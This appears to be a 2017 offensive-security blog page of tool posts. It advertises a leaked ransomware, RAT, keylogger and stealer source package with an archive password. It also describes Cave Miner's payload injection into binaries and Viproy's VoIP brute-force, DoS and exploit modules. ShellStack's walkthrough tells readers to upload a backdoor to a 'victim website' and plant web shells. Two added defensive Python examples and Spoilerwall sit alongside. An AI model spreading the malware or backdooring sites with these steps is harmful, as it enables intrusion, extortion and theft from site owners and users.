SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

Thursday, July 27, 2017

Collection Package Ransomware, Malware, BotNet - Pr1v8 Source Code Leaked



Please note, I am not responsible for your actions.

Ransomware is a type of malicious software from cryptovirology that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. While some simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, more advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem, and difficult-to-trace digital currencies such as Ukash and Bitcoin are used for the ransoms, making tracing and prosecuting the perpetrators difficult.

A remote administration tool (RAT) is a piece of software or programming that allows a remote "operator" to control a system as if they had physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as the payload of a Trojan horse, and will try to hide its operation from the victim and from security software.

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogging can also be used to study human–computer interaction. Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis.

Stealers: the term info stealer is self-explanatory. This type of malware resides in an infected computer and gathers data in order to send it to the attacker. Typical targets are credentials used in online banking services, social media sites, emails, or FTP accounts.



Source: Wikipedia
Password: seginfo

By OffSec 2017







Search for Code Cave in All Binaries (ELF, PE and Mach-o) and Inject Payload - CAVE MINER


This tool searches for code caves in binaries (ELF, Mach-O, PE) and injects code into them.

Features
  • Find code caves in ELF, PE and Mach-o
  • Use custom bytes for the search (e.g. 0xCC can be used as the null byte on PE)
  • See virtual address of the code cave.
  • See the permissions of the code caves.
  • Search custom cave size
  • Inject the payload into the binary
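The feature list above describes the search side of Cave Miner: runs of one filler byte, their file offsets, their virtual addresses and the permissions of the segment they sit in. The following is an added example, not Cave Miner's own code, that implements that search and adds the check a defender wants from it: baseline the caves of a clean build and later report any cave that no longer contains only filler, which is what an injection into padding looks like. The segment table and the sample image are constructed for the example; a real scanner would read segments from the ELF/PE/Mach-O headers.

```python
"""Added example, not Cave Miner's own code: inventory the code caves in a raw
binary image and re-check them later for tampering.

A code cave is taken here to be a run of at least `min_size` copies of one
filler byte (0x00 by default; 0xCC on some PE builds) in the file. Segment
tables and the sample image below are constructed for the example; a real
scanner would read them from the ELF/PE/Mach-O headers.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Segment:
    file_offset: int   # where the segment's bytes start in the file
    file_size: int     # how many file bytes it covers
    vaddr: int         # virtual address of file_offset once loaded
    perms: str         # e.g. "r-x"


@dataclass(frozen=True)
class Cave:
    offset: int            # file offset of the run
    size: int              # run length in bytes
    vaddr: Optional[int]   # load address, or None if outside every segment
    perms: str             # permissions of the enclosing segment, "---" if none


def find_runs(data: bytes, filler: int = 0x00, min_size: int = 32) -> List[Tuple[int, int]]:
    """Return (offset, length) for every run of `filler` at least min_size long."""
    pattern = re.compile(re.escape(bytes([filler])) + b"{%d,}" % min_size)
    return [(m.start(), m.end() - m.start()) for m in pattern.finditer(data)]


def find_caves(data: bytes, segments: List[Segment],
               filler: int = 0x00, min_size: int = 32) -> List[Cave]:
    """Locate filler runs and map each one to its segment (address, permissions)."""
    caves = []
    for offset, size in find_runs(data, filler, min_size):
        vaddr, perms = None, "---"
        for seg in segments:
            if seg.file_offset <= offset and offset + size <= seg.file_offset + seg.file_size:
                vaddr = seg.vaddr + (offset - seg.file_offset)
                perms = seg.perms
                break
        caves.append(Cave(offset, size, vaddr, perms))
    return caves


def tampered_caves(baseline: List[Cave], data: bytes, filler: int = 0x00) -> List[Cave]:
    """Return the caves of a clean baseline that no longer hold only filler,
    i.e. padding that has been written to since the baseline was taken."""
    return [c for c in baseline
            if data[c.offset:c.offset + c.size] != bytes([filler]) * c.size]


# Constructed sample image: a 0x100-byte header segment with no filler, a
# 0x200-byte executable segment containing one 0x80-byte cave, and 0x20 bytes
# of unmapped trailing padding.
SEGMENTS = [
    Segment(file_offset=0x000, file_size=0x100, vaddr=0x400000, perms="r--"),
    Segment(file_offset=0x100, file_size=0x200, vaddr=0x401000, perms="r-x"),
]
SAMPLE = (b"\x7fELF" + b"A" * 0xFC
          + b"\x90" * 0x40 + b"\x00" * 0x80 + b"\xc3" * 0x140
          + b"\x00" * 0x20)

# The same image after four bytes were written into the executable cave.
_tampered = bytearray(SAMPLE)
_tampered[0x150:0x154] = b"\xcc\xcc\xcc\xcc"
TAMPERED = bytes(_tampered)

if __name__ == "__main__":
    caves = find_caves(SAMPLE, SEGMENTS)
    for c in caves:
        where = f"0x{c.vaddr:x}" if c.vaddr is not None else "unmapped"
        print(f"cave at file offset 0x{c.offset:x}, {c.size} bytes, vaddr {where}, perms {c.perms}")
    print("tampered caves:", [hex(c.offset) for c in tampered_caves(caves, TAMPERED)])
```

Only caves that fall entirely inside a segment get an address and permissions; a cave in an executable (r-x) segment is the kind worth re-checking in a baseline comparison, since code placed there runs without any permission change.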

Dependencies
  • Python 2.7
Installation
pip install cave-miner


Example







VoIP Penetration Testing and Exploitation Kit - Viproy



Viproy VoIP Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for the SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 was released at Black Hat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extensions support, a Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analysis modules.

Current Version and Updates
Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Homepage of Project
http://viproy.com

Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken
https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken
https://www.youtube.com/watch?v=rl_kp5UZKlw

DEF CON 24 - VoIP Wars: The Live Workshop
To be added later

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync
http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version
https://youtu.be/TMdiXYzY8qY

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck
http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop
https://youtu.be/hwDD7K9oXeI

Black Hat USA 2014 / DEF CON 22 - VoIP Wars: Attack of the Cisco Phones
https://www.youtube.com/watch?v=hqL25srtoEY

DEF CON 21 - VoIP Wars: Return of the SIP
https://www.youtube.com/watch?v=d6cGlTB6qKw

Attacking SIP/VoIP Servers Using Viproy
https://www.youtube.com/watch?v=AbXh_L0-Y5A

Current Testing Modules
  • SIP Register
  • SIP Invite
  • SIP Message
  • SIP Negotiate
  • SIP Options
  • SIP Subscribe
  • SIP Enumerate
  • SIP Brute Force
  • SIP Trust Hacking
  • SIP UDP Amplification DoS
  • SIP Proxy Bounce
  • Skinny Register
  • Skinny Call
  • Skinny Call Forward
  • CUCDM Call Forwarder
  • CUCDM Speed Dial Manipulator
  • MITM Proxy TCP
  • MITM Proxy UDP
  • Cisco CDP Spoofer
  • Boghe VoIP Client INVITE PoC Exploit (New)
  • Boghe VoIP Client MSRP PoC Exploit (New)
  • SIP Message with INVITE Support (New)
  • Sample SIP SDP Fuzzer (New)
  • MSRP Message Tester with SIP INVITE Support (New)
  • Sample MSRP Message Fuzzer with SIP INVITE Support (New)
  • Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation
Copy "lib" and "modules" folders' content to Metasploit root directory.
The Mixins.rb file (lib/msf/core/auxiliary/mixins.rb) should contain the following lines:
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'

Usage of SIP Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SIPUSAGE.md

Usage of Skinny Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SKINNYUSAGE.md

Usage of Auxiliary Viproy Modules
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md



A PHP Based Tool That Helps You To Manage All Your Backdoored Websites Efficiently - ShellStack



ShellStack is a PHP-based backdoor management tool. This tool comes in handy for "HACKERS" who wish to keep track of every website they hack. The tool generates a backdoor file which you just have to upload to the site; then put the backdoor URL in the shells.txt file present in the tool's directory.

With ShellStack You can
  • Import PHP Shells
  • Get Server Details
  • Upload Files From Your System using your terminal
  • And Above all You Can Manage Your Backdoors Efficiently

How To Use
  1. git clone https://github.com/Tuhinshubhra/shellstack
  2. cd shellstack
  3. php shellstack.php
  4. Type generatebd, then exit the tool with CTRL + C. This will generate a backdoor file named backdoor.php in the same directory as the tool.
  5. Upload The Backdoor File To The Victim website
  6. Copy The Backdoor URL and paste it in the shells.txt file present in the tool's directory and save it (Each backdoor is separated by a new line)
  7. php shellstack.php
  8. Enter The Serial No Assigned To The Backdoor
  9. The rest is self-explanatory.
Watch The Video Here: https://youtu.be/umk3ZNZ5Y1I

Requirements
php
curl 

Example
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php


________________________________________________________________________________
_______ _     _ _______               _______ _______ _______ _______ _     _
|______ |_____| |______ |      |      |______    |    |_____| |       |____/
______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
________________________________________________________________________________

                    Simple Backdoor Management System
                    Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
                    Shout Out: LulZSec India  
================================================================================



List Of Backdoors:

0. http://localhost/backdoor.php
=============================================

[#] Enter Either Of These (Backdoor No.|help|generatebd) : 0

[+] Shell Selected: http://localhost/backdoor.php
[+] Validating Backdoor: Backdoor Found!

List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):2

[+] Server Info
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP: 127.0.0.1


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):1


List Of Shells
===============
[1] Dhanush shell {User & Pass : shellstack123}
[2] B374K shell {Pass : shellstack123}
[3] Kurama shell V.1.0 {Pass : red}
[4] WSO shell {Pass : shellstack123}
[5] MiNi shell {User & Pass : shellstack123}

[#] Select Shell To Import(1-5):1


[i] Importing Shell...
[i] Sending Request And Getting Response...
[R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):5
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 

Release(s)
Version 1.0 On 14-06-2017

Screenshot



Avoid being scanned by spoiling movies on all your ports! - spoilerwall




Spoilerwall introduces a brand new concept in the field of network hardening. Avoid being scanned by spoiling movies on all your ports!
Firewall? How about Fire'em'all! Stop spending thousands of dollars on big teams that you don't need! Just fire up the Spoilers Server and that's it!

Movie Spoilers DB + Open Ports + Pure Evil = Spoilerwall

Set your own:
  1. Clone this repo
$ git clone git@github.com:infobyte/spoilerwall.git
  2. Edit the file server-spoiler.py and set the HOST and PORT variables.
  3. Run the server
$ python2 server-spoiler.py
The server will listen on the selected port (8080 by default). Redirect incoming TCP traffic in all ports to this service by running:
iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 1:65535 -j DNAT --to-destination {HOST}:{PORT}
Change {HOST} and {PORT} for the values set in step (2). Also, if the traffic is redirected to localhost, run:
sysctl -w net.ipv4.conf.eth0.route_localnet=1
Using this config, an nmap scan will show every port as open and a spoiler for each one.
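With the DNAT rule above, every probed port is funnelled into one local listener, so the listener itself no longer knows which port the scanner dialled unless it asks the kernel. The following is an added example, not Spoilerwall's own server-spoiler.py: a catch-all listener that recovers the original destination port with the netfilter SO_ORIGINAL_DST socket option (option number 80 from linux/netfilter_ipv4.h, Linux only), records which remote address probed which port, and answers with a spoiler chosen by that port so repeated scans see a stable banner. The spoiler entries are constructed for the example.

```python
"""Added example, not Spoilerwall's own server-spoiler.py: a catch-all TCP
listener for the iptables DNAT setup above. Because every redirected
connection lands on one local port, the listener recovers the port the scanner
actually probed via SO_ORIGINAL_DST (Linux netfilter only), records it, and
answers with a spoiler chosen by that port. The spoiler entries are constructed
for the example; 80 is the SO_ORIGINAL_DST option number from
linux/netfilter_ipv4.h.
"""
import socket
import struct
from typing import List, Tuple

SO_ORIGINAL_DST = 80
SOL_IP = getattr(socket, "SOL_IP", 0)

SPOILERS = [  # constructed sample entries, not a real spoiler database
    ("A Constructed Film", "The narrator was the ghost all along."),
    ("Sequel: Constructed Harder", "The bridge collapses; everyone swims."),
    ("Constructed III", "The twin did it."),
]


def build_sockaddr_in(ip: str, port: int) -> bytes:
    """Encode a sockaddr_in the way the kernel returns it: sin_family in host
    byte order, sin_port in network byte order, sin_addr, 8 bytes of padding."""
    return (struct.pack("=H", socket.AF_INET) + struct.pack("!H", port)
            + socket.inet_aton(ip) + b"\x00" * 8)


def parse_original_dst(raw: bytes) -> Tuple[str, int]:
    """Decode the sockaddr_in from getsockopt(SOL_IP, SO_ORIGINAL_DST)."""
    if len(raw) < 8:
        raise ValueError("sockaddr_in too short")
    family = struct.unpack("=H", raw[:2])[0]
    if family != socket.AF_INET:
        raise ValueError(f"unexpected address family {family}")
    port = struct.unpack("!H", raw[2:4])[0]
    return socket.inet_ntoa(raw[4:8]), port


def spoiler_for_port(port: int) -> str:
    """Pick a spoiler deterministically so repeated scans of a port see the same banner."""
    title, text = SPOILERS[port % len(SPOILERS)]
    return f"{title}\r\n\r\n{text}\r\n"


def handle(conn: socket.socket, peer: Tuple[str, int], log: List[Tuple[str, int]]) -> int:
    """Serve one connection; return the port the client originally dialled."""
    try:
        _, port = parse_original_dst(conn.getsockopt(SOL_IP, SO_ORIGINAL_DST, 16))
    except (OSError, ValueError):
        port = conn.getsockname()[1]   # not redirected by netfilter: use the real local port
    log.append((peer[0], port))        # who probed which port: the useful record for a defender
    conn.sendall(spoiler_for_port(port).encode())
    conn.close()
    return port


def serve(host: str = "0.0.0.0", port: int = 8080) -> None:
    """Accept loop; with the DNAT rule in place every TCP port ends up here."""
    log: List[Tuple[str, int]] = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(64)
        while True:
            conn, peer = srv.accept()
            probed = handle(conn, peer, log)
            print(f"{peer[0]} probed port {probed}")


if __name__ == "__main__":
    serve()
```

Run it on the HOST:PORT pair used in the iptables rule; the per-connection log of (source address, original port) is what turns the joke into a cheap scan detector, since a legitimate client never touches dozens of unrelated ports in sequence.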
View the live demo running at spoilerwall.faradaysec.com:
~ ❯❯❯ telnet spoilerwall.faradaysec.com 23
Trying 138.197.196.144...
Connected to spoilerwall.faradaysec.com.
Escape character is '^]'.

Gummo

Fucked up people killing cats after a tornado

Connection closed by foreign host.
Browse in Shodan (but beware of the Spoilers!):
https://www.shodan.io/host/138.197.196.144
Be careful in your next CTF - you never know when the spoilers are coming!



Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.